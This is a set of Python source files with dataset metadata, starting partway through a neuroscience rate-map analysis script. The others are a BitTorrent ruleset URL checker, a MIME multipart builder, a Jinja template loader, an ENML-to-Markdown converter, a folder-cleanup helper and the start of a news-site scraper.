scipy.ndimage.filters as flt\nfrom functions_analysis import spike_map, binning\n\n\ndef analysis_path_cluster(ntrial, case, learning, inter):\n\n folder1 = 'data_analysis'\n\n os.system('mkdir -p '+folder1+'/figures_interneurons/')\n os.system('mkdir -p '+folder1+'/metrics_interneurons/')\n fdname1 = '/'+folder1+'/figures_interneurons/'\n fdname2 = '/'+folder1+'/metrics_interneurons/'\n\n cond = '../Simulation_Results/'+learning+'/'+case\n print(\"Analyse ... 
\" + case + \" trial \"+ntrial + \" \" + learning)\n\n os.system('mkdir -p '+folder1+'/figures_interneurons/'+learning+'/')\n os.system('mkdir -p '+folder1+'/metrics_interneurons/'+learning+'/')\n # Define the map size!\n maindir = os.getcwd()\n\n # Give path dimensions\n # Give path dimensions\n npath_x = 200\n npath_y = 1\n # Number of pyramidal\n Ncells = 130\n Nbins = 100\n skernel = 3.0 / (npath_x/Nbins)\n runsAll = 5\n\n # Number of basket cells\n if inter == 'bcell':\n Ncells = 8\n elif inter == 'vipcck' or inter == 'vipcrnvm':\n Ncells = 1\n elif inter == 'vipcr':\n Ncells = 4\n elif inter == 'olm' or inter == 'aacell' or inter == 'bscell':\n Ncells = 2\n\n # 3-d matrix of all interneurons\n rateMaps = np.zeros((Ncells, Nbins, npath_y))\n rateMaps_unsmoothed = np.zeros((Ncells, Nbins, npath_y))\n time_array_in_bin = np.zeros((Ncells, Nbins, npath_y))\n\n # File location - pathfile\n fileload = folder1 + '/metrics_permutations/'+learning\n\n with open(fileload+'/path_all_trial_'+str(ntrial)+'.pkl', 'rb') as f:\n path_all = pickle.load(f)\n\n # Loop for all INs\n for ncell in range(Ncells):\n # A matrix for rate map\n Zall = np.zeros((Nbins, npath_y))\n time_array_all = np.zeros(Nbins*npath_y)\n\n for nrun in range(1, runsAll+1):\n\n # Load of path -- different for each run\n path = path_all[nrun-1]\n\n # make the time - space map\n time_array = np.bincount(path[:, 0])[1:]\n csum = np.cumsum(time_array)\n\n fileload = cond+'/Trial_' + \\\n str(ntrial)+'/Run_'+str(nrun)+'/spiketimes_'+inter+'_.pkl'\n with open(fileload, 'rb') as f:\n spiketimes_all = pickle.load(f)\n spiketimes = spiketimes_all[ncell][1:]\n\n Z = spike_map(spiketimes, csum, npath_x, npath_y)\n # Take the sum over all runs given by total\n Zall += binning(Z, Nbins, 'summing')\n time_array_binned = binning(time_array, Nbins, 'summing').squeeze()\n\n # time spent in each bin in ms\n time_array_all += time_array_binned / 1000.0\n\n # Calculate the time spent in each bin\n time_array_smoothed = flt.gaussian_filter1d(\n time_array_all, sigma=skernel, mode='nearest', truncate=3.0)\n Zsmoothed = flt.gaussian_filter1d(\n Zall.squeeze(), sigma=skernel, mode='nearest', truncate=3.0)\n # convert to Hz, so divide with seconds\n # time ms/1000 (ms/sec) --> seconds\n Zmean = np.divide(Zsmoothed, time_array_smoothed)\n\n rateMaps_unsmoothed[int(ncell), :, :] = Zall\n rateMaps[int(ncell), :, :] = Zmean.reshape(-1, 1)\n time_array_in_bin[int(ncell), :, :] = time_array_all.reshape(-1, 1)\n\n print('\\nDone with the rate maps')\n\n # ==============================================================================\n # ##################### RATE MAPS SAVING #################################\n # ==============================================================================\n filesave = maindir+fdname2+learning\n\n mydict = {}\n mydict['maps'] = rateMaps\n mydict['maps_unsmoothed'] = rateMaps_unsmoothed\n mydict['time_in_bin'] = time_array_in_bin\n if not os.path.exists(filesave):\n os.makedirs(filesave)\n\n with open(filesave+'/pickled_sn_'+inter+'_'+case+'_'+ntrial+'.pkl', 'wb') as handle:\n pickle.dump(mydict, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n print(\"\\nDone with \"+case+\" analysis. 
Done with trial \"+ntrial)\n\n\ntic = time.time()\nntrial = sys.argv[1]\ncase = sys.argv[2]\nlearning = sys.argv[3]\ninter = sys.argv[4]\nresults = analysis_path_cluster(ntrial, case, learning, inter)\ntoc = time.time()\n\nprint(\"\\nTotal time: \"+str(round(toc-tic, 3))+\" seconds\")\n", "sub_path": "AnalysisRawData/heatmaps_interneurons.py", "file_name": "heatmaps_interneurons.py", "file_ext": "py", "file_size_in_byte": 4482, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.system", "line_number": 22, "usage_type": "call"}, {"api_name": "os.system", "line_number": 23, "usage_type": "call"}, {"api_name": "os.system", "line_number": 30, "usage_type": "call"}, {"api_name": "os.system", "line_number": 31, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 58, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.cumsum", "line_number": 79, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 84, "usage_type": "call"}, {"api_name": "functions_analysis.spike_map", "line_number": 87, "usage_type": "call"}, {"api_name": "functions_analysis.binning", "line_number": 89, "usage_type": "call"}, {"api_name": "functions_analysis.binning", "line_number": 90, "usage_type": "call"}, {"api_name": "scipy.ndimage.filters.gaussian_filter1d", "line_number": 96, "usage_type": "call"}, {"api_name": "scipy.ndimage.filters", "line_number": 96, "usage_type": "name"}, {"api_name": "scipy.ndimage.filters.gaussian_filter1d", "line_number": 98, "usage_type": "call"}, {"api_name": "scipy.ndimage.filters", "line_number": 98, "usage_type": "name"}, {"api_name": "numpy.divide", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 120, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 123, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 123, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 128, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 129, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 130, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 131, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 132, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 134, "usage_type": "call"}]} +{"seq_id": "489649688", "text": "#exit 0 // OK\n#exit 1 // Warning (if applicable)\n#exit 2 // Critical error\n#test\n\nimport requests\nimport sys,os\nimport crypto\nsys.modules['Crypto'] = crypto\nfrom Crypto.Cipher import AES #pip install pycrypto, install crypto\nimport base64\n\nclass Crypt():\n\tdef encryption(self, privateInfo, key):\n\t\tBLOCK_SIZE = 16\n\t\tPADDING = '{'\n\t\tpad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING\n\t\tEncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))\n\t\tkey = 
str(key)\n\t\tif len(key) < 16:\n\t\t\tkey = key + (\"0\" * (16 - len(key)))\n\t\tcipher = AES.new(key)\n\t\tencoded = EncodeAES(cipher, str(privateInfo))\n\t\treturn encoded.decode(\"utf-8\")\n\n\tdef decryption(self, encryptedString, key):\n\t\tPADDING = b'{'\n\t\tDecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)\n\t\tencryption = str(encryptedString)\n\t\tkey = str(key)\n\t\tif len(key) < 16:\n\t\t\tkey = key + (\"0\" * (16 - len(key)))\n\t\tcipher = AES.new(key)\n\t\tdecoded = DecodeAES(cipher, encryption)\n\t\treturn decoded.decode(\"utf-8\")\n\n\tdef encrypt(self, privateInfo, key):\n\t\tif 'list' in str(privateInfo.__class__):\n\t\t\trez = []\n\t\t\tfor item in privateInfo:\n\t\t\t\trez.append(self.encryption(item, key))\n\t\t\treturn rez\n\t\telse:\n\t\t\treturn self.encryption(privateInfo, key)\n\n\tdef decrypt(self, privateInfo, key):\n\t\tif 'list' in str(privateInfo.__class__):\n\t\t\trez = []\n\t\t\tfor item in privateInfo:\n\t\t\t\trez.append(self.decryption(item, key))\n\t\t\treturn rez\n\t\telse:\n\t\t\treturn self.decryption(privateInfo, key)\n\nclass Check():\n\tdef __init__(self):\n\t\tself.allowedProducts=['utorrent','bittorrent','utmac','btmac','hydra-ut','hydra-bt']\n\n\tdef usage(self):\n\t\tprint('Usage: '+os.path.basename(__file__)+' product\\n\\tproduct: \\n\\t\\t', end='')\n\t\tprint(self.allowedProducts)\n\t\tprint('\\n\\tkey\\n\\t\\tThe secret key to decrypt credentials\\n\\n\\tExample: '+os.path.basename(__file__)+' \\'utorrent,bittorrent,btmac\\' secretKey123')\n\t\tsys.exit(1)\n\n\tdef unknown(self):\n\t\tprint ('Unknown product: '+sys.argv[1]+'\\n')\n\t\tself.usage()\n\n\tdef parse(self): # todo: use urllib.urlparser instead\n\t\tif len(sys.argv)<3:\n\t\t\tself.usage()\n\t\tproducts=sys.argv[1].replace(\"'\",'').split(',')\n\n\t\tfor product in products:\n\t\t\tprint(product)\n\t\t\tif product not in self.allowedProducts:\n\t\t\t\tself.unknown()\n\t\trez=[]\n\t\tfor product in products:\n\t\t\tfor url in self.getUrls(product):\n\t\t\t\trez.append(url)\n\t\t\tif len(rez)==0:\n\t\t\t\tprint(\"Failed to load rules for product\")\n\t\t\t\tsys.exit(2) #no rules was found for product\n\t\treturn rez\n\n\tdef req(self,product):\n\t\theaders = {'api-key':crypt.decrypt('qDLdfOQKGzHe7zgHO5NPngpIcJ0jjCntbHtZBSb8cj0=',sys.argv[2])}\n\t\ttry:\n\t\t\tUTr=requests.get('https://cherryui.bittorrent.com/api/v2/ruleset/'+product+'/',headers=headers, timeout=3)\n\t\t\tUTdata=UTr.text\n\t\t\treturn UTdata\n\t\texcept:\n\t\t\tprint('Error - request timeout.')\n\t\t\tsys.exit(1)\n\n\tdef getUrls(self,product):\n\t\tr=self.req(product).split(',')\n\t\tz=0\n\t\trez=[]\n\t\tfor word in r:\n\t\t\tif word[1:5]=='uuid':\n\t\t\t\tz=z+1\n\t\t\t\ttmp=('http://download-01.utorrent.com/uuid/'+word[8:len(word)-1])\n\t\t\t\trez.append(tmp)\n\t\t\t\ttmp=('http://download-02.utorrent.com/uuid/'+word[8:len(word)-1])\n\t\t\t\trez.append(tmp)\n\t\treturn rez[2:] #Returns list or real urls for 'product' (cutting first 2 empty cherry links)\n\n\n\nif __name__=='__main__':\n\tcrypt=Crypt()\n\tcheck=Check()\n\tprint(check.parse())\n\tsys.exit(0)\n\n\n\n", "sub_path": "checkCherryRules.py", "file_name": "checkCherryRules.py", "file_ext": "py", "file_size_in_byte": 3269, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.modules", "line_number": 9, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 18, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 22, 
"usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 22, "usage_type": "name"}, {"api_name": "base64.b64decode", "line_number": 28, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 33, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 33, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 63, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 66, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 70, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 72, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 84, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 88, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 90, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 95, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "373456151", "text": "#!/usr/bin/python\nimport os\nimport argparse\nfrom email.MIMEMultipart import MIMEMultipart\nfrom email.MIMEBase import MIMEBase\nfrom email import Encoders\n\ndef makemultipart(atomfile, package, outfile):\n atompart = MIMEBase('application', 'atom+xml')\n atompart.add_header('Content-Disposition', 'attachment; name=atom')\n atompart.set_payload(atomfile.read())\n\n payloadpart = MIMEBase('application', 'zip')\n payloadpart.add_header('Content-Disposition',\n 'attachment; name=payload; filename=%s' % os.path.basename(\n package.name))\n payloadpart.set_payload(package.read())\n Encoders.encode_base64(payloadpart)\n\n message = MIMEMultipart('related')\n message.attach(atompart)\n message.attach(payloadpart)\n\n # print(message.as_string(unixfrom=False))\n outfile.write(message.as_string(unixfrom=False))\n outfile.close()\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Create a multipart file from an atom entry and a package '\n '(zip, word, odt)')\n parser.add_argument('atomfile', help='/path/to/atomfile', type=open)\n parser.add_argument('package', help='/path/to/package', type=open)\n parser.add_argument('outfile', help='name of output file', type=argparse.FileType('w + '))\n args = parser.parse_args()\n makemultipart(args.atomfile, args.package, args.outfile)\n\nif __name__ == '__main__':\n main()\n", "sub_path": "contentcopytool/lib/makemultipart.py", "file_name": "makemultipart.py", "file_ext": "py", "file_size_in_byte": 1429, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "email.MIMEBase.MIMEBase", "line_number": 9, "usage_type": "call"}, {"api_name": "email.MIMEBase.MIMEBase", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "email.Encoders.encode_base64", "line_number": 18, "usage_type": "call"}, {"api_name": "email.Encoders", "line_number": 18, "usage_type": "name"}, {"api_name": "email.MIMEMultipart.MIMEMultipart", "line_number": 20, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 30, "usage_type": "call"}, {"api_name": "argparse.FileType", 
"line_number": 34, "usage_type": "call"}]} +{"seq_id": "18081674", "text": "#--------------------------------------------------------------------------\n# File and Version Information:\n# $Id$\n#\n# Description:\n# Module TemplateLoader...\n#\n#------------------------------------------------------------------------\n\n\"\"\"Implementation of a Jinja template loader.\n\nThis loader looks for files in $SIT_DATA/psddl/templates directories.\nOne template file can contain multiple templates, each template is\npreceeded by a line starting with \"::::template::::\" string followed\nby spaces and the name of a template which is a single word, any words \nfollowing template name are ignored (can be used for comments). Lines\nstarting with colon are ignored.\n\nThis software was developed for the LCLS project. If you use all or \npart of it, please give an appropriate acknowledgment.\n\n@version $Id$\n\n@author Andy Salnikov\n\"\"\"\n\n\n#------------------------------\n# Module's version from CVS --\n#------------------------------\n__version__ = \"$Revision$\"\n# $Source$\n\n#--------------------------------\n# Imports of standard modules --\n#--------------------------------\nimport sys\nimport os\nimport re\n\n#---------------------------------\n# Imports of base class module --\n#---------------------------------\nimport jinja2 as ji\n\n#-----------------------------\n# Imports for other modules --\n#-----------------------------\n\n#----------------------------------\n# Local non-exported definitions --\n#----------------------------------\n\n#------------------------\n# Exported definitions --\n#------------------------\n\n\n#---------------------\n# Class definition --\n#---------------------\nclass TemplateLoader(ji.FileSystemLoader):\n\n #----------------\n # Constructor --\n #----------------\n def __init__(self, package='psddl', templateSubDir='templates'):\n '''Loads templates for psddl. 
Similar to the jinja2 PackageLoader()\n function but adapted for packages within the SIT build system\n (as opposed to Python packages.)\n ARGS:\n templateSubdir - a subdirectory to the data directory of the \n package.\n\n Due to an issue with jinja 2.8, we cache the templates ourselve, we\n expect the environment to be created with a cache_size of 0\n '''\n self.package=package\n self.templateSubDir=templateSubDir\n path = os.environ['SIT_DATA'].split(':')\n ji.FileSystemLoader.__init__(self, path)\n\n self.template_cache={}\n #-------------------\n # Public methods --\n #-------------------\n\n def get_source(self, environment, template):\n if template in self.template_cache:\n return self.template_cache[template]\n orig_template_name = template\n # template name is the file name followed by \"?template\"\n fname, template = template.split('?')\n\n # prepend package/templateSubDir to path (defaults to psddl/templates)\n fname = os.path.join(\"%s/%s\" % (self.package,self.templateSubDir), fname)\n\n # call base class method\n source, path, helper = ji.FileSystemLoader.get_source(self, environment, fname)\n\n # iterate over lines, find a template\n tmpl = []\n collect = False\n for line in source.splitlines(True):\n words = line.split()\n if words and words[0] == \"::::template::::\":\n if words[1] == template:\n collect = True\n else:\n collect = False\n elif line and line[0] == ':':\n pass\n elif collect: \n tmpl.append(line)\n templateSource = ''.join(tmpl)\n self.template_cache[orig_template_name] = (templateSource, path, helper)\n return ''.join(tmpl), path, helper\n\n #--------------------------------\n # Static/class public methods --\n #--------------------------------\n\n #--------------------\n # Private methods --\n #--------------------\n\n#\n# In case someone decides to run this module\n#\nif __name__ == \"__main__\" :\n\n # In principle we can try to run test suite for this module,\n # have to think about it later. 
Right now just abort.\n sys.exit ( \"Module is not supposed to be run as main module\" )\n", "sub_path": "src/TemplateLoader.py", "file_name": "TemplateLoader.py", "file_ext": "py", "file_size_in_byte": 4170, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "jinja2.FileSystemLoader", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 80, "usage_type": "attribute"}, {"api_name": "jinja2.FileSystemLoader.__init__", "line_number": 81, "usage_type": "call"}, {"api_name": "jinja2.FileSystemLoader", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "jinja2.FileSystemLoader.get_source", "line_number": 99, "usage_type": "call"}, {"api_name": "jinja2.FileSystemLoader", "line_number": 99, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 134, "usage_type": "call"}]} +{"seq_id": "11045215", "text": "# encoding: utf-8\n# vim: sts=4 sw=4 fdm=marker\n# Author: kakkyz \n# License: MIT\nimport markdown\nimport xml.sax.saxutils\nimport re\n\n# TODO: use vim indent length?\n__INDENT__ = 4 * \" \"\n\nclass parserOption: # {{{\n def __init__(self):\n self.a = False\n self.ul = 0\n self.ol = 0\n self.li = 0\n self.pre = False\n self.code = False\n self.p = False\n self.blockquote = 0\n self.listCount = 0\n\n def __str__(self):\n return \"a={0} ul={1} ol={2} li={3} pre={4} code={5} p={6} blockquote={7} listCount={8} \".format(\n self.a,\n self.ul,\n self.ol,\n self.li,\n self.pre,\n self.code,\n self.p,\n self.blockquote,\n self.listCount)\n#}}}\n\nremoveheadercode = re.compile('^')\nremovefootercode = re.compile('$')\n\n\ndef parseENML(node, level=0, result='', option=parserOption()): # {{{\n# import html2text\n# return html2text.html2text(node.toxml())\n# print node.toxml()\n# print \"{0}:{1}:{2}:{3}:{4}:{5}\".format(\n# level ,\n# _getNodeType(node) ,\n# _getTagName(node),\n# _getAttribute(node),\n# _getData(node), option)\n if node.nodeType == node.ELEMENT_NODE:\n tag = _getTagName(node)\n if tag == \"en-note\":\n for child in node.childNodes:\n if child.nodeType == node.ELEMENT_NODE:\n # Partition block\n if len(result) == 0 or result[-2:] == '\\n\\n':\n pass\n elif result[-1:] == '\\n':\n result += '\\n'\n else:\n result += '\\n\\n'\n result += parseENML(child, level + 1, \"\", option) + '\\n'\n elif node.nodeType == node.TEXT_NODE:\n result += parseENML(child, level + 1, \"\", option)\n elif tag == \"a\":\n htmlhref = _getAttribute(node)\n option.a = True\n htmltext = \"\".join([parseENML(child, level + 1, \"\", option) for child in node.childNodes])\n option.a = False\n# result += '[{0}]({1})'.format(htmltext, htmlhref) # this code does not work multibyte!\n result += '[' + htmltext + '](' + htmlhref + ')'\n elif tag == \"pre\":\n option.pre = True\n result += \"\".join([parseENML(child, level + 1, result, option) for child in node.childNodes])\n option.pre = False\n elif tag == \"code\":\n option.code = True\n if option.pre == True:\n # precode = removeheadercode.sub('', xml.sax.saxutils.unescape(node.toxml()))\n precode = removeheadercode.sub('', _unescape(node.toxml()))\n precode = removefootercode.sub('', precode)\n for line in precode.splitlines():\n result += __INDENT__ + \"%s\\n\" % line.rstrip()\n result += \"\\n\"\n else:\n # incode = removeheadercode.sub('`', xml.sax.saxutils.unescape(node.toxml()))\n incode = 
removeheadercode.sub('`', _unescape(node.toxml()))\n incode = removefootercode.sub('`', incode)\n result += incode\n option.code = False\n elif tag == \"p\":\n option.p = True\n result += \"\".join([parseENML(child, level + 1, \"\", option) for child in node.childNodes])\n result = re.compile(r'').sub(' ', result)\n result += '\\n'\n option.p = False\n elif tag == \"ul\":\n option.ul += 1\n option.listCount = 0\n result += \"\".join([parseENML(child, level + 1, \"\", option) for child in node.childNodes])\n # print \"'\"+result+\"'\"\n option.ul -= 1\n elif tag == \"ol\":\n option.ol += 1\n option.listCount = 0\n result += \"\".join([parseENML(child, level + 1, \"\", option) for child in node.childNodes])\n option.ol -= 1\n elif tag == \"li\":\n option.li += 1\n option.listCount += 1\n listCount = option.listCount\n\n indent = __INDENT__ * (option.li - 1)\n if _getTagName(node.parentNode) == 'ul':\n result += indent + \"* \"\n elif _getTagName(node.parentNode) == 'ol':\n result += indent + str(option.listCount) + \". \"\n\n for child in node.childNodes:\n cont = parseENML(child, level + 1, '', option)\n if cont.strip():\n if child.nodeType == node.ELEMENT_NODE \\\n and _getTagName(child) in ['ul', 'ol']:\n if result[-1] != '\\n':\n result += '\\n'\n else:\n # ['strong', 'em']\n if result[-1] != ' ':\n result += ' '\n result += cont\n if result[-1] != '\\n':\n result += '\\n'\n option.listCount = listCount\n option.li -= 1\n elif tag == \"strong\":\n result = \"\".join([parseENML(child, level + 1, \"\", option) for child in node.childNodes])\n result = '**' + result + '**'\n elif tag == \"em\":\n result = \"\".join([parseENML(child, level + 1, \"\", option) for child in node.childNodes])\n result = '_' + result + '_'\n elif tag in [\"img\", \"br\", \"en-media\", \"en-todo\", \"en-crypt\"]: # 後で改行を除去して見やすくする?\n result += node.toxml()\n result += \"\\n\"\n elif tag == \"blockquote\":\n option.blockquote += 1\n result += \"\".join([parseENML(child, level + 1, \"\", option) for child in node.childNodes])\n result = \"\\n\".join(['> ' + line for line in result[:-1].split(\"\\n\")]) + \"\\n\"\n option.blockquote -= 1\n if level == 0:\n result += \"\\n\"\n elif tag == \"hr\":\n result += \"-----\"\n elif tag in [\"h1\", \"h2\", \"h3\", \"h4\", \"h5\", \"h6\"]:\n headerlv = tag[1:]\n result += (\"#\" * int(headerlv)) + \" \" + \"\".join([parseENML(child, level + 1, \"\", option) for child in node.childNodes])\n else:\n result += \"\".join([parseENML(child, level + 1, result, option) for child in node.childNodes])\n elif node.nodeType == node.TEXT_NODE:\n text = _getData(node)\n if text:\n result += text\n if not option.pre:\n result = _clearNeedlessSpace(result)\n return result\n#}}}\n\n\ndef parseMarkdown(mkdtext): # {{{\n m = markdown.markdown(mkdtext.decode('utf-8'))\n return m\n#}}}\n\n# ----- private methods\n\n\ndef _getTagName(node): # {{{\n if node.nodeType == node.ELEMENT_NODE:\n return node.tagName\n return None\n#}}}\n\n\ndef _getData(node): # {{{\n \"\"\" return textdata \"\"\"\n if node.nodeType == node.TEXT_NODE:\n return node.data.strip()\n return \"\"\n#}}}\n\ndef _unescape(text): # {{{\n import HTMLParser\n return HTMLParser.HTMLParser().unescape(text)\n#}}}\n\ndef _clearNeedlessSpace(text):\n text = re.compile(r'[ \\t]*\\n[ \\t]*').sub('\\n', text)\n return re.compile(r'[ \\t]+').sub(' ', text)\n\ndef _getAttribute(node): # {{{\n try:\n if _getTagName(node) == \"a\":\n return node.getAttribute(\"href\")\n except:\n pass\n return None\n#}}}\n\n\ndef _getNodeType(node): # {{{\n 
\"\"\" return NodeType as String \"\"\"\n if node.nodeType == node.ELEMENT_NODE : return \"ELEMENT_NODE\"\n elif node.nodeType == node.ATTRIBUTE_NODE : return \"ATTRIBUTE_NODE\"\n elif node.nodeType == node.TEXT_NODE : return \"TEXT_NODE\"\n elif node.nodeType == node.CDATA_SECTION_NODE : return \"CDATA_SECTION_NODE\"\n elif node.nodeType == node.ENTITY_NODE : return \"ENTITY_NODE\"\n elif node.nodeType == node.PROCESSING_INSTRUCTION_NODE : return \"PROCESSING_INSTRUCTION_NODE\"\n elif node.nodeType == node.COMMENT_NODE : return \"COMMENT_NODE\"\n elif node.nodeType == node.DOCUMENT_NODE : return \"DOCUMENT_NODE\"\n elif node.nodeType == node.DOCUMENT_TYPE_NODE : return \"DOCUMENT_TYPE_NODE\"\n elif node.nodeType == node.NOTATION_NODE : return \"NOTATION_NODE\"\n return \"UKNOWN NODE\"\n#}}}\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n", "sub_path": "plugin/py/markdownAndENML.py", "file_name": "markdownAndENML.py", "file_ext": "py", "file_size_in_byte": 8598, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "re.compile", "line_number": 37, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 38, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 95, "usage_type": "call"}, {"api_name": "markdown.markdown", "line_number": 170, "usage_type": "call"}, {"api_name": "HTMLParser.HTMLParser", "line_number": 193, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 197, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 198, "usage_type": "call"}, {"api_name": "doctest.testmod", "line_number": 227, "usage_type": "call"}]} +{"seq_id": "520604304", "text": "import os\nfrom pathlib import Path\n\n\ndef empty_folders_before_run():\n \"\"\" \n Empty folders and create folders for the subtitles and audio files if it does not exist.\n \"\"\"\n\n folder_subtitles = Path('data/output/subtitles')\n\n # Create a folder if it does not exist.\n create_folder(folder_subtitles)\n\n for the_file in os.listdir(folder_subtitles):\n file_path = os.path.join(folder_subtitles, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(e)\n \n folder_audio = Path('data/output/audio')\n create_folder(folder_audio)\n\n for the_file in os.listdir(folder_audio):\n file_path = os.path.join(folder_audio, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(e)\n\n\ndef create_folder(directory):\n \"\"\" \n Creates a folder.\n \"\"\"\n try:\n if not os.path.exists(directory):\n os.makedirs(directory)\n except OSError:\n print ('Error: Creating directory. 
' + directory) \n    ", "sub_path": "library/preparetion/empty_folders.py", "file_name": "empty_folders.py", "file_ext": "py", "file_size_in_byte": 1140, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pathlib.Path", "line_number": 10, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 19, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 23, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "515657501", "text": "# import libraries\n\nimport urllib2\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.common.exceptions import NoAlertPresentException\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport time\nimport traceback\nimport json\nimport re\n\n# specify the url\npaperPage = \"https://www.jagran.com\"\nhdr = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',\n       'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n       'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n       'Accept-Encoding': 'none',\n       'Accept-Language': 'en-US,en;q=0.8',\n       'Connection': 'keep-alive'}\n\nreq = urllib2.Request(paperPage, headers=hdr)\npage = urllib2.urlopen(req)\n\n# parse the html using beautiful soup and store in variable `soup`\nsoup = BeautifulSoup(page, \"html.parser\")\n# Take out the
